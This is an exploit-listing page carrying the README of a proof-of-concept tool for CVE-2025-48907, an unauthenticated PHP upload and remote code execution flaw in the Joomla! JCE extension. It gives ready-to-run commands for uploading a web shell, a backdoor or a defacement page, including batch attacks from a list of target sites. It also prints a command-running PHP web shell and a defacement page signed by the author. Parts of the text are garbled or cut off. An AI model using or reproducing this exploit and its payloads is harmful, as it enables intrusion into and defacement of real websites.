Share
## https://sploitus.com/exploit?id=0D7DE32F-DF63-51D0-A699-AAD3D055B58E
CVE-2025-48907 - Joomla! JCE Unauthenticated RCE
Joomla! JCE extension
[](https://opensource.org/licenses/MIT)
[](https://www.python.org/downloads/)
[](https://github.com/0xgh057r3c0n/CVE-2025-48907)
---
## ๐ Overview
This repository contains a **proof-of-concept (PoC) exploit** for **CVE-2025-48907**, a critical vulnerability in the Joomla! JCE (Joomla Content Editor) extension versions prior to **2.9.99.5**. The vulnerability allows **unauthenticated attackers** to upload arbitrary **PHP files** via the JCE profile import functionality, leading to **Remote Code Execution (RCE)**.
### โ ๏ธ Disclaimer
> **This tool is for educational and authorized testing purposes only.**
> - Use only on systems you own or have explicit permission to test
> - The author is not responsible for any misuse or illegal activities
> - Always obtain proper authorization before testing
---
## ๐ Vulnerability Details
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-48907 |
| **Product** | Joomla! JCE Extension |
| **Affected Versions** | -F
```
### Examples
#### Upload a PHP Web Shell
```bash
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php
```
#### Upload a PHP Deface Page
```bash
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php
```
#### Upload a PHP Backdoor
```bash
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php
```
#### Batch Exploitation with Targets File
```bash
python3 CVE-2025-48907.py -f targets.txt -F payload.php
```
#### With Verbose Output & Results Saving
```bash
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt
```
### Command Line Arguments
| Argument | Required | Description |
|----------|----------|-------------|
| `-u, --url` | Yes* | Single target URL (e.g., http://target.com) |
| `-f, --file` | Yes* | File containing list of target URLs (one per line) |
| `-F, --upload-file` | Yes | PHP file to upload (shell, backdoor, deface page) |
| `-v, --verbose` | No | Enable verbose output for debugging |
| `-o, --output` | No | Save successful upload URLs to file |
*\* Either `-u` or `-f` must be provided*
### Targets File Format
Create a `targets.txt` file with one URL per line:
```text
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Comments are ignored
https://example-joomla.com
```
---
## ๐ง Creating PHP Payloads
All payloads must be **PHP files** since the exploit uploads PHP code that will be executed on the server.
### PHP Web Shell
Create `shell.php`:
```php
";
system($_GET['cmd']);
echo "";
} else {
echo "Usage: ?cmd=command";
}
?>
```
### PHP Deface Page
Create `deface.php`:
```php
Hacked by 0xgh057r3c0n
body {
background: #000;
color: #0f0;
font-family: "Courier New", monospace;
text-align: center;
padding: 50px;
}
h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
.ascii-art { white-space: pre; font-size: 12px; }
HACKED BY 0xgh057r3c0n
โโโ โโโ โโโโโโ โโโโโโโโโโ โโโโโโโโโโโโโโโโโโ
โโโ โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโ โโโ โโโ
โโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโ โโโ โโโ
โโโ โโโโโโ โโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโ
โโโ โโโโโโ โโโ โโโโโโโโโโ โโโโโโโโโโโโโโโโโโ
Security is not a product, it\'s a process.
Server:
Time:
';
?>
```
### PHP Backdoor (Minimal)
Create `backdoor.php`:
```php
```
---
## ๐ Output Example
```
_____________ _______________ _______________ ________ ________ _____ ______ ________________________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/ _____/ / | | / __ \/ __ \ _ \______ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ __ \ ______ / | |_>
Built with โค๏ธ by 0xgh057r3c0n